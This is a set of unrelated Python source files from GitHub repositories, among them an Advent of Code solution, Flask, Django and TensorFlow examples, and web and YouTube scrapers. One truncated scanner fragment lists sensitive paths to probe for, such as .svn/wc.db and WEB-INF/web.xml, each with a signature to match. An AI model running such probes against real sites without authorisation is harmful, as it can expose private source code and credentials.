*\n\n\"\"\"\n\"\"\"\n\n\n@click.command()\n@click.argument('input_filepath', type=click.Path(exists=True))\n@click.argument('output_filepath', type=click.Path())\ndef main(input_filepath, output_filepath):\n \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n pipeline_yb = Pipeline([\n ('year_built', YearBuiltExtractor())\n ])\n\n # df = pd.read_csv('../data/raw/tmp_ds_cluster.csv.gz', dtype=dtype)\n df = pd.read_csv(input_filepath)\n df_out = pd.read_csv(input_filepath)\n\n X = pipeline_yb.fit_transform(df)\n\n df_out.to_csv(output_filepath, index=False)\n\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"franc3000/ds_mega","sub_path":"ds_mega/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21544677581","text":"from collections import defaultdict, deque\nimport re\n\nwith open('07.txt', 'r') as file:\n data = file.read()\n\n\ndef parse_input(data):\n bags = re.findall(r'([a-z]+ [a-z]+) bags contain (.+)', data)\n pattern = re.compile(r'(\\d+) ([a-z]+ [a-z]+) bag')\n graph = {bag: {nested_bag: int(v) for v, nested_bag in pattern.findall(nested_bags)} for bag, nested_bags in bags}\n return graph\n\n\ndef create_reverse_graph(graph):\n rev = defaultdict(list)\n for k, v in graph.items():\n for new_key in v.keys():\n rev[new_key].append(k)\n return rev\n\n\ndef part_one(rev):\n q = deque(['shiny gold'])\n seen = set()\n while q:\n cur = q.popleft()\n if cur not in seen:\n q += deque(rev[cur])\n seen.add(cur)\n return len(seen) - 1 # remove one for 'shiny gold'\n\n\ndef part_two(graph):\n def dfs(bag):\n return 1 + sum((v * dfs(k)) for k, v in graph[bag].items())\n return dfs('shiny gold') - 1 # remove one for 'shiny gold'\n\n\ngraph = parse_input(data)\nrev_graph = create_reverse_graph(graph)\n\nprint(f'Part 1: {part_one(rev_graph)}') # 372\nprint(f'Part 2: {part_two(graph)}') # 8015\n","repo_name":"michaeljgallagher/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"16962808584","text":"import os\nfrom re import template\nfrom flask import Flask\nfrom flask.helpers import url_for\nfrom flask.templating import render_template\nfrom flask_mail import Mail, Message\n\napp = Flask(__name__)\nmail = Mail(app)\n\napp.config['MAIL_SERVER'] = 'smtp.googlemail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = os.evniron.get('MAIL_USERNAME')\napp.config['MAIL_PASSWORD'] = os.environ.get(\"MAIL_PASSWORD\")\n\napp.config['FLASKY_MAIL_SUBJECT_PREFIX'] = ['Flasky']\napp.config['FLASKY_MAIL_SENDER'] = 'Flasky Admin '\n\napp.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')\n\ndef 
send_mail(to,subject,template,**kwargs):\n msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])\n msg.body = render_template(template + '.txt', **kwargs)\n msg.html = render_template(template + '.html', **kwargs)\n mail.send(msg)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n form = NameForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.name.data).first()\n if user is None:\n user = User(username=form.name.data)\n db.session.add(user)\n session['know'] = False\n if app.config['FLASKY_ADMIN']:\n send_email(app.config['FLASKY_ADMIN'], 'New User', 'mail/new_user', user=user)\n else:\n session['know'] = True\n session['name'] = form.name.data\n form.name.data = ''\n return redirect(url_for('index'))\n return render_template('index.html', form=form, name=session.get('name'), know=session.get('know', False))","repo_name":"bbnopy/pryklady","sub_path":"Python_ALL/Flask/4flaskWebDevelopment2/part1/chapter6/listing6.1.Hello.FlaskMailConfiguration/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7875152065","text":"from sos.plugins import Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin\nimport glob\nimport os\n\n\nclass LibvirtClient(Plugin, RedHatPlugin, UbuntuPlugin, DebianPlugin):\n \"\"\"client for libvirt virtualization API\n \"\"\"\n\n plugin_name = 'virsh'\n profiles = ('system', 'virt')\n\n packages = ('libvirt-client',)\n\n def setup(self):\n # virt-manager logs\n if not self.get_option(\"all_logs\"):\n self.add_copy_spec(\"/root/.virt-manager/*\", sizelimit=5)\n else:\n self.add_copy_spec(\"/root/.virt-manager/*\")\n\n cmd = 'virsh -r'\n\n # get host information\n subcmds = [\n 'list --all',\n 'domcapabilities',\n 'capabilities',\n 'nodeinfo',\n 'freecell',\n 'node-memory-tune',\n 'version'\n ]\n\n for subcmd in subcmds:\n self.add_cmd_output('%s %s' % (cmd, subcmd))\n\n # get network, pool and nwfilter elements\n for k in ['net', 'nwfilter', 'pool']:\n self.add_cmd_output('%s %s-list' % (cmd, k))\n k_list = self.get_command_output('%s %s-list' % (cmd, k))\n if k_list and k_list['status'] == 0:\n k_lines = k_list['output'].splitlines()\n # the 'Name' column position changes between virsh cmds\n pos = k_lines[0].split().index('Name')\n for j in filter(lambda x: x, k_lines[2:]):\n n = j.split()[pos]\n self.add_cmd_output('%s %s-dumpxml %s' % (cmd, k, n))\n\n # cycle through the VMs/domains list, ignore 2 header lines and latest\n # empty line, and dumpxml domain name in 2nd column\n domains_output = self.get_command_output('%s list --all' % cmd)\n if domains_output and domains_output['status'] == 0:\n domains_lines = domains_output['output'].splitlines()[2:]\n for domain in filter(lambda x: x, domains_lines):\n d = domain.split()[1]\n for x in ['dumpxml', 'dominfo', 'domblklist']:\n self.add_cmd_output('%s %s %s' % (cmd, x, d))\n# vim: et ts=4 sw=4\n","repo_name":"wzzalx/wzz","sub_path":"python2.7/site-packages/sos/plugins/virsh.py","file_name":"virsh.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9000061739","text":"import cv2\n\nBCOLOR = (75, 0, 130)\nTHICKNESS = 4\n\nimg_color = cv2.imread(\"assets/ocbc.jpg\")\nimg_color = cv2.resize(img_color, None, None, fx=0.5, fy=0.5)\nimg = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)\n\nblurred = 
cv2.GaussianBlur(img, (7, 7), 0)\nblurred = cv2.bilateralFilter(blurred, 5, sigmaColor=50, sigmaSpace=50)\nedged = cv2.Canny(blurred, 130, 150, 255)\n\ncv2.imshow(\"Outline of device\", edged)\ncv2.waitKey(0)\n\ncnts, _ = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n# sort contours by area, and get the first 10\ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:9]\n\ncv2.drawContours(img_color, cnts, 0, BCOLOR, THICKNESS)\ncv2.imshow(\"Target Contour\", img_color)\ncv2.waitKey(0)\n\nfor i, cnt in enumerate(cnts):\n cv2.drawContours(img_color, cnts, i, BCOLOR, THICKNESS)\n print(f\"ContourArea:{cv2.contourArea(cnt)}\")\n cv2.imshow(\"Contour one by one\", img_color)\n cv2.waitKey(0)\n","repo_name":"onlyphantom/cvessentials","sub_path":"digitrecognition/contourarea_01.py","file_name":"contourarea_01.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"85"} +{"seq_id":"6896379350","text":"#working on interview questions\n\n#find missing number in an int array of 1 to 100\ndef missingInt(a):\n\tif a[0] != 100:\n\t\treturn 100\n\tif a[1] != a[0] + 1:\n\t\treturn a[0] + 1\n\telse:\n\t\treturn missingInt(a[1:])\ndef main():\n\tlst = [i for i in range(101)]\n\tlst.remove(100)\n\tprint(missingInt(lst))\nmain()","repo_name":"richard-paredes/CS-Fundamentals","sub_path":"Algorithms/Notes/programming.py","file_name":"programming.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"32305073105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @author: 'orleven'\n\nfrom script import Script, SERVICE_PORT_MAP\n\n_file_dic = {\n \"crossdomain.xml\": 'allow-access-from domain=\"*\"',\n \".svn/entries\": 'dir',\n \".svn/wc.db\": 'sqlite format',\n \"WEB-INF/web.xml\": \"str:\n return f'Request :{self.req_user1} - {self.req_user2}'\n\n\n@receiver([signals.post_save],sender=FriendRequest)\ndef notify_group(sender, instance, **kwargs):\n from accounts.models import CustomUser\n\n room_name_postfix = instance.receiver.username\n group_name = \"friend_request_\"+room_name_postfix\n consumer_method_type = 'friend_request_operations'\n if not kwargs['created']:\n data = {}\n friend_requests = FriendRequest.objects.filter(receiver=instance.receiver, is_pending = True)\n sender_ids = friend_requests.values('sender_id')\n print(sender_ids)\n sender_qs = CustomUser.objects.filter(id__in = sender_ids).order_by('request_sender')\n print(\"khai yesle kaam garekai chaina jasto cha\")\n data['sender'] = list(sender_qs.values(\n 'username',\n 'first_name',\n 'last_name',\n 'id',\n 'profile_image',\n ))\n \n data['friend_requests'] = list(friend_requests.values('id','receiver','sender'))\n perform_broadcast(data,group_name,consumer_method_type)\n pass\n elif kwargs['created']:\n data = {}\n friend_requests = FriendRequest.objects.filter(receiver=instance.receiver, is_pending = True)\n sender_ids = friend_requests.values('sender_id')\n sender_qs = CustomUser.objects.filter(id__in = sender_ids)\n data['sender'] = list(sender_qs.values(\n 'username',\n 'first_name',\n 'last_name',\n 'id',\n 'profile_image',\n ))\n data['friend_requests'] = list(friend_requests.values('id','receiver','sender'))\n print(\"yo chai new create vako\")\n 
perform_broadcast(data,group_name,consumer_method_type)\n\n\n\n","repo_name":"bpdyl/chat-application-dh","sub_path":"ChatApp/friends/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73985661716","text":"\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport process_image\n\n\ntrain_image, train_label, test_image, test_label=process_image.read_data()\n\n\nmax_epochs=12000\nLR=1e-5\nbatch_size=125\ndisplay_step=100\n\nimage_size = 64 \nn_classes = 2\ndropout = 0.75\n\nx = tf.placeholder(tf.float32, [None, image_size,image_size,1])\ny = tf.placeholder(tf.float32, [None, n_classes])\n\nkeep_prob = tf.placeholder(tf.float32)\n\ndef conv2d(img, w, b):\n\treturn tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(img, w,strides=[1, 1, 1, 1],padding='SAME'),b))\n\ndef max_pool(img, k):\n\treturn tf.nn.max_pool(img, ksize=[1, k, k, 1],strides=[1, k, k, 1],padding='SAME')\n\nwc1 = tf.Variable(tf.random_normal([5, 5, 1, 32]))\nbc1 = tf.Variable(tf.random_normal([32]))\n\nwc2 = tf.Variable(tf.random_normal([5, 5, 32, 64]))\nbc2 = tf.Variable(tf.random_normal([64]))\n\nwc3 = tf.Variable(tf.random_normal([5, 5, 64, 128]))\nbc3 = tf.Variable(tf.random_normal([128]))\n\nwc4 = tf.Variable(tf.random_normal([5, 5, 128, 256]))\nbc4 = tf.Variable(tf.random_normal([256]))\n\nwc5 = tf.Variable(tf.random_normal([5, 5, 256, 512]))\nbc5 = tf.Variable(tf.random_normal([512]))\n\n\n\nwd1 = tf.Variable(tf.random_normal([(image_size//32)*(image_size//32)*512, 1024]))\n\nwout = tf.Variable(tf.random_normal([1024, n_classes]))\nbd1 = tf.Variable(tf.random_normal([1024]))\n\ntf.summary.histogram('wc1',wc1)\ntf.summary.histogram('bc1',bc1)\ntf.summary.histogram('wc2',wc2)\ntf.summary.histogram('bc2',bc2)\ntf.summary.histogram('wc3',wc3)\ntf.summary.histogram('bc3',bc3)\ntf.summary.histogram('wc4',wc4)\ntf.summary.histogram('bc4',bc4)\ntf.summary.histogram('wc5',wc5)\ntf.summary.histogram('bc5',bc5)\ntf.summary.histogram('wd1',wd1)\ntf.summary.histogram('wout',wout)\ntf.summary.histogram('bd1',bd1)\n\n\n\nbout = tf.Variable(tf.random_normal([n_classes]))\n\nconv1 = conv2d(x,wc1,bc1)\n\nconv1 = max_pool(conv1, k=2)\n\nconv2 = conv2d(conv1,wc2,bc2)\n\nconv2 = max_pool(conv2, k=2)\n\nconv3 = conv2d(conv2,wc3,bc3)\n\nconv3 = max_pool(conv3, k=2)\n\nconv4 = conv2d(conv3,wc4,bc4)\n\nconv4 = max_pool(conv4, k=2)\n\nconv5 = conv2d(conv4,wc5,bc5)\n\nconv5 = max_pool(conv5, k=2)\n\n\ndense1 = tf.reshape(conv5, [-1,wd1.get_shape().as_list()[0]])\n\ndense1 = tf.nn.relu(tf.add(tf.matmul(dense1, wd1),bd1))\n\ndense1 = tf.nn.dropout(dense1, keep_prob)\n\npred = tf.add(tf.matmul(dense1, wout), bout)\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\ntf.summary.scalar(\"Loss\",cost)\noptimizer =tf.train.RMSPropOptimizer(learning_rate=LR).minimize(cost)\n\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\ntf.summary.scalar(\"accuracy\",accuracy)\n\ninit_op= tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init_op)\n summary=tf.summary.merge_all()\n file_write=tf.summary.FileWriter(\"output\",sess.graph)\n\n\n for epochs in range(max_epochs):\n index=np.random.choice(train_image.shape[0],size=batch_size)\n batch_image=train_image[index]\n batch_label=train_label[index]\n 
sess.run([optimizer],feed_dict={x:batch_image,y:batch_label,keep_prob:dropout})\n\n\n if epochs % display_step==0:\n train_loss,summary1=sess.run([cost,summary],feed_dict={x:batch_image,y:batch_label,keep_prob:dropout})\n test_accuarcy,summary2=sess.run([accuracy,summary],feed_dict={x:test_image,y:test_label,keep_prob:1.0})\n file_write.add_summary(summary1,global_step=epochs)\n file_write.add_summary(summary2,global_step=epochs)\n print(\"Training Loss: {} Test Accuarcy: {}\".format(train_loss,test_accuarcy))\n \n\n\n\n print(\"Finish Training......\")","repo_name":"HarryChen1995/Cat_VS_Dog","sub_path":"cat_dog_CNN.py","file_name":"cat_dog_CNN.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6183053392","text":"# https://www.hackerrank.com/challenges/breaking-best-and-worst-records/problem\n\ndef breakingRecords(scores):\n # 처음엔 min=socre[0], max=score[0]\n # 이후 각 점수가 max보다 큰지 min보다 작은지 체크\n # 해당하면 그 값을 교체\n # 교체할 때마다 각 count +1 \n minScore = maxScore = scores[0]\n minCount = maxCount = 0\n for score in scores:\n if score < minScore:\n minScore = score\n minCount += 1\n elif score > maxScore:\n maxScore = score\n maxCount += 1\n return [maxCount, minCount]\n\nif __name__ == \"__main__\":\n scoreNum = input()\n scores = list(map(int,input().split()))\n result = ' '.join(map(str, breakingRecords(scores)))\n print(result)","repo_name":"2kindsofcs/exercise","sub_path":"python exercise/breaking-the-records.py","file_name":"breaking-the-records.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"9226444070","text":"import os \nimport json\nimport pafy\nimport json\nimport time\nimport wave\nimport ffmpy\nimport pandas as pd\nimport soundfile as sf\nimport shutil \n\nfilename=input('what is the file name? 
\\n')\ndesktop=\"/Users/jim/Desktop/\"\nos.chdir(desktop)\nfoldername=filename[0:-5]\ndestfolder=desktop+foldername+'/'\ntry:\n os.mkdir(foldername)\n os.chdir(destfolder)\nexcept:\n os.chdir(destfolder)\n\n#move file to destfolder \nshutil.move(desktop+filename,destfolder+filename)\n\n#load xls sheet\nloadfile=pd.read_excel(filename)\nlink=loadfile.iloc[:,0]\nlength=loadfile.iloc[:,1]\ntimes=loadfile.iloc[:,2]\nlabel=loadfile.iloc[:,3]\n\n#initialize lists \nlinks=list()\nlengths=list()\nstart_times=list()\nend_times=list()\nlabels=list()\n\n#only make links that are in youtube processable \nfor i in range(len(link)):\n if str(link[i]).find('youtube.com/watch') != -1:\n links.append(str(link[i]))\n lengths.append(str(length[i]))\n #find the dash for start/stop times\n time=str(times[i])\n index=time.find('-')\n start_time=time[0:index]\n #get start time in seconds \n start_minutes=int(start_time[0])\n start_seconds=int(start_time[-2:])\n start_total=start_minutes*60+start_seconds\n #get end time in seconds \n end_time=time[index+1:]\n end_minutes=int(end_time[0])\n end_seconds=int(end_time[-2:])\n end_total=end_minutes*60+end_seconds\n #update lists \n start_times.append(start_total)\n end_times.append(end_total)\n #labels\n labels.append(str(label[i]))\n\nfiles=list()\nfor i in range(len(links)):\n try: \n video=pafy.new(links[i])\n bestaudio=video.getbestaudio()\n filename=bestaudio.download()\n start=start_times[i]\n end=end_times[i]\n extension=bestaudio.extension\n #get file extension and convert to .wav for processing later \n os.rename(filename,'%s_start_%s_end_%s%s'%(str(i),start,end,extension))\n filename='%s_start_%s_end_%s%s'%(str(i),start,end,extension)\n if extension not in ['.wav']:\n xindex=filename.find(extension)\n filename=filename[0:xindex]\n ff=ffmpy.FFmpeg(\n inputs={filename+extension:None},\n outputs={filename+'.wav':None}\n )\n ff.run()\n os.remove(filename+extension)\n \n file=filename+'.wav'\n data,samplerate=sf.read(file)\n totalframes=len(data)\n totalseconds=totalframes/samplerate\n startsec=int(start_times[i])\n startframe=samplerate*startsec\n endsec=int(end_times[i])\n endframe=samplerate*endsec\n sf.write('snipped'+file, data[startframe:endframe], samplerate)\n os.remove(file)\n\n #can write json too \n \n \n except:\n print('no urls')\n\n\n","repo_name":"jim-schwoebel/allie","sub_path":"annotation/helpers/helpers/yscrape.py","file_name":"yscrape.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"85"} +{"seq_id":"35351775178","text":"'''\nAdapted from\nhttps://github.com/hshustc/CVPR19_Incremental_Learning/blob/master/cifar100-class-incremental/modified_linear.py\n\nReference:\n[1] Saihui Hou, Xinyu Pan, Chen Change Loy, Zilei Wang, Dahua Lin\n Learning a Unified Classifier Incrementally via Rebalancing. 
CVPR 2019\n'''\n\nimport math\nimport torch\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom typing import Union\n\n\nclass CosineLinear(Module):\n def __init__(self, in_features, out_features, sigma: Union[bool, float, int] = True):\n super(CosineLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.empty(out_features, in_features), requires_grad=True)\n if isinstance(sigma, bool):\n if sigma:\n self.sigma = Parameter(torch.empty(1), requires_grad=True)\n self.sigma.data.fill_(1)\n else:\n self.register_parameter('sigma', None)\n elif isinstance(sigma, int) or isinstance(sigma, float):\n self.register_buffer('sigma', torch.tensor(float(sigma)))\n else:\n raise ValueError(\"sigma should be a boolean or a float\")\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, input_: torch.Tensor):\n out = F.linear(F.normalize(input_, p=2,dim=1), F.normalize(self.weight, p=2, dim=1))\n if self.sigma is not None:\n out = self.sigma * out\n return out\n\n\nclass SplitCosineLinear(Module):\n #consists of two fc layers and concatenate their outputs\n def __init__(self, in_features, out_features1, out_features2, sigma: Union[bool, float, int] = True):\n super(SplitCosineLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features1 + out_features2\n self.fc1 = CosineLinear(in_features, out_features1, False)\n self.fc2 = CosineLinear(in_features, out_features2, False)\n if isinstance(sigma, bool):\n if sigma:\n self.sigma = Parameter(torch.empty(1), requires_grad=True)\n self.sigma.data.fill_(1)\n else:\n self.register_parameter('sigma', None)\n elif isinstance(sigma, int) or isinstance(sigma, float):\n self.register_buffer('sigma', torch.tensor(float(sigma)))\n else:\n raise ValueError(\"sigma should be a boolean or a float\")\n\n def forward(self, x):\n out1 = self.fc1(x)\n out2 = self.fc2(x)\n out = torch.cat((out1, out2), dim=1) # concatenate along the channel\n if self.sigma is not None:\n out = self.sigma * out\n return out\n","repo_name":"chandar-lab/IIRC","sub_path":"lifelong_methods/models/cosine_linear.py","file_name":"cosine_linear.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"85"} +{"seq_id":"43821328859","text":"from selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nimport time\r\nimport sys\r\nimport os\r\n\r\nimport requests # request img from web\r\nimport shutil # save img locally\r\n\r\nfrom PIL import Image\r\nfrom PIL import ImageOps\r\n\r\ndef resize_img(filename):\r\n img = Image.open(filename).convert('RGBA')\r\n new_image = Image.new(\"RGBA\", img.size, \"WHITE\")\r\n new_image.paste(img, (0, 0), img)\r\n img = ImageOps.pad(new_image, (300,300), centering=(0.5,0.5), color=(255, 255, 255))\r\n\r\n os.remove(filename)\r\n filename = filename.rsplit('.', 1)[0] + '.jpg'\r\n img.convert('RGB').save(filename)\r\n\r\ndef save_img(curr_pokemon, curr_pokemon_img):\r\n img_url = curr_pokemon.find_element(By.TAG_NAME, \"img\").get_attribute(\"src\")\r\n curr_pokemon_img = f\"{curr_pokemon_img}.{img_url.rsplit('.', 1)[-1]}\"\r\n res = requests.get(img_url, stream = True)\r\n\r\n if res.status_code == 200:\r\n with open(curr_pokemon_img,'wb') as 
f:\r\n shutil.copyfileobj(res.raw, f)\r\n else:\r\n print('Image Couldn\\'t be retrieved')\r\n\r\n resize_img(curr_pokemon_img)\r\n\r\ndef main():\r\n os.system('cls')\r\n\r\n global exec_path\r\n\r\n exec_path = sys.argv[0]\r\n exec_path = exec_path.replace(\"\\\\\", \"/\")\r\n\r\n i_last_slash = exec_path[::-1].find(\"/\")\r\n\r\n exec_path = exec_path[: -i_last_slash]\r\n\r\n print(f\"Path: {exec_path}\")\r\n\r\n chrome_service = Service(f\"{exec_path}/chromedriver.exe\")\r\n chromium_options = webdriver.ChromeOptions()\r\n\r\n try:\r\n driver = webdriver.Chrome(service=chrome_service, options=chromium_options)\r\n except:\r\n print(\"Chrome Driver not in same directory, place it correctly!\")\r\n exit()\r\n \r\n driver.maximize_window()\r\n driver.get('https://pokemondb.net/pokedex/national')\r\n\r\n pokemon_img_path = f\"{exec_path}images/\"\r\n\r\n if not os.path.exists(pokemon_img_path):\r\n os.mkdir(pokemon_img_path)\r\n\r\n print(\"Waiting for the page\")\r\n time.sleep(2)\r\n\r\n gen_infocards = driver.find_elements(By.CLASS_NAME, \"infocard-list\")\r\n\r\n for gen_num, gen_elem in enumerate(gen_infocards):\r\n print(f\"Retrieving pokemon images of gen {gen_num+1}\")\r\n\r\n pokemon_elems = gen_elem.find_elements(By.CLASS_NAME, \"infocard\")\r\n\r\n for curr_pokemon in pokemon_elems:\r\n pokemon_name = curr_pokemon.find_element(By.CLASS_NAME, \"ent-name\").text.replace(\":\", \"\")\r\n print(f\"Current pokemon is {pokemon_name}\")\r\n\r\n curr_pokemon_path = f\"{pokemon_img_path}{pokemon_name}/\"\r\n\r\n info_url = curr_pokemon.find_element(By.TAG_NAME, \"a\").get_attribute(\"href\")\r\n\r\n # Open new tab\r\n driver.switch_to.new_window()\r\n\r\n driver.get(f\"https://pokemondb.net/{info_url}\")\r\n\r\n\r\n multiple_variants = driver.find_elements(By.CSS_SELECTOR, \".tabset-basics > .sv-tabs-tab-list > a\")\r\n multiple_variants_names = [elem.text for elem in multiple_variants]\r\n\r\n #if (multiple_variants):\r\n # variant_elems = multiple_variants.find_elements(By.TAG_NAME, \"a\")\r\n\r\n\r\n driver.get(f\"https://pokemondb.net/{info_url.replace('pokedex', 'artwork')}\")\r\n\r\n artwork_list = driver.find_elements(By.CLASS_NAME, \"grid-col\")\r\n\r\n if (not artwork_list):\r\n driver.get(f\"https://pokemondb.net/{info_url.replace('artwork', 'pokedex')}\")\r\n\r\n if (len(multiple_variants) == 1):\r\n if not os.path.exists(curr_pokemon_path):\r\n os.mkdir(curr_pokemon_path)\r\n\r\n curr_pokemon = driver.find_element(By.CLASS_NAME, \"grid-col\")\r\n curr_pokemon_img = f\"{curr_pokemon_path}0\"\r\n save_img(curr_pokemon, curr_pokemon_img)\r\n else:\r\n for variant in multiple_variants:\r\n variant_name = variant.text\r\n\r\n curr_variant_path = f\"{pokemon_img_path}{variant_name}/\"\r\n \r\n if not os.path.exists(curr_variant_path):\r\n os.mkdir(curr_variant_path)\r\n \r\n variant.click()\r\n\r\n time.sleep(1)\r\n\r\n curr_pokemon = driver.find_element(By.CLASS_NAME, \"grid-col\")\r\n \r\n curr_pokemon_img = f\"{curr_variant_path}0\"\r\n save_img(curr_pokemon, curr_pokemon_img)\r\n\r\n else:\r\n if (len(multiple_variants) == 1):\r\n if not os.path.exists(curr_pokemon_path):\r\n os.mkdir(curr_pokemon_path)\r\n for num, curr_artwork in enumerate(artwork_list):\r\n curr_pokemon_img = f\"{curr_pokemon_path}{num}\"\r\n save_img(curr_artwork, curr_pokemon_img)\r\n else:\r\n num_img = [[name, 0] for name in multiple_variants_names]\r\n num_img.reverse()\r\n for curr_artwork in artwork_list:\r\n variant_text = curr_artwork.find_element(By.CLASS_NAME, \"text-muted\").text\r\n\r\n for 
curr_num in num_img:\r\n curr_variant = curr_num[0]\r\n if (curr_variant in variant_text):\r\n curr_variant_path = f\"{pokemon_img_path}{curr_variant}/\"\r\n\r\n if not os.path.exists(curr_variant_path):\r\n os.mkdir(curr_variant_path)\r\n\r\n curr_pokemon_img = f\"{curr_variant_path}{curr_num[1]}\"\r\n save_img(curr_artwork, curr_pokemon_img)\r\n\r\n curr_num[1] += 1\r\n\r\n break\r\n \r\n\r\n\r\n\r\n driver.close()\r\n driver.switch_to.window(driver.window_handles[0])\r\n\r\n\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"abprous/Clasificador-Tipos-Pokemon","sub_path":"fetchPokemonImages.py","file_name":"fetchPokemonImages.py","file_ext":"py","file_size_in_byte":6058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38846574664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 29 14:39:30 2018\n\n@author: Andy\n\"\"\"\n\n#Sample execution python run_job.py ./input/window.txt ./input/actual.txt ./input/predicted.txt ./output/comparison.txt\n\n#sys library for inputting files as arguments \nimport sys\n\n#import os \n#dir_path='/Users/zza847/Downloads/prediction-validation-master/insight_testsuite'\n#dir_path = os.path.dirname(os.path.realpath(__file__))\n#print('current working directory is: '+ dir_path)\n\n#Function to check and read in each input file.\ndef readFile(direc):\n with open(direc,'r') as f_in:\n lines = list(line for line in (l.strip() for l in f_in) if line)\n if len(lines) == 0:\n print('ERROR: The input file :'+direc+' is empty')\n else:\n return(lines)\n \n\n#input files \n#actual_file=dir_path+'/tests/test_1/input/actual.txt'\n#predicted_file=dir_path+'/tests/test_1/input/predicted.txt'\n#window_file=dir_path+'/tests/test_1/input/window.txt'\n\n#Input file arguments into script\nwindow_file = sys.argv[1]\nactual_file = sys.argv[2]\npredicted_file = sys.argv[3]\noutput_file = sys.argv[4]\n\n#read in first line of file and use as window size\nwindow=readFile(window_file)[0]\nwindow=int(window) if window.isdigit() else print('need to input a number in the window.txt')\n\n#read in predicted/actual files\nactual=readFile(actual_file)\npredicted=readFile(predicted_file)\n\n#define the actual dic and predict_dict, the key is the tiime and stock name, the value is the value\nactual_dict={i.rsplit('|', 1)[0]:float(i.rsplit('|', 1)[1]) for i in actual }\npredicted_dict={i.rsplit('|', 1)[0]:float(i.rsplit('|', 1)[1]) for i in predicted } \n\n#define the error dict, key are the intesect of actual and predict\nintersect_keys=list(set(actual_dict.keys())& set(predicted_dict.keys()))\nerror_dict={key:abs(actual_dict[key]-predicted_dict[key]) for key in intersect_keys}\n\n#define the largest number for the slide window\ntime_list=[int(i.split('|')[0]) for i in intersect_keys]\nmax_num=max(time_list)\n\n#find the stock from the intesect \nstock_names=list(set([i.split('|')[1] for i in intersect_keys]))\n\n#calculate the error\ni=1\nprint('max time is larger than sliding window? 
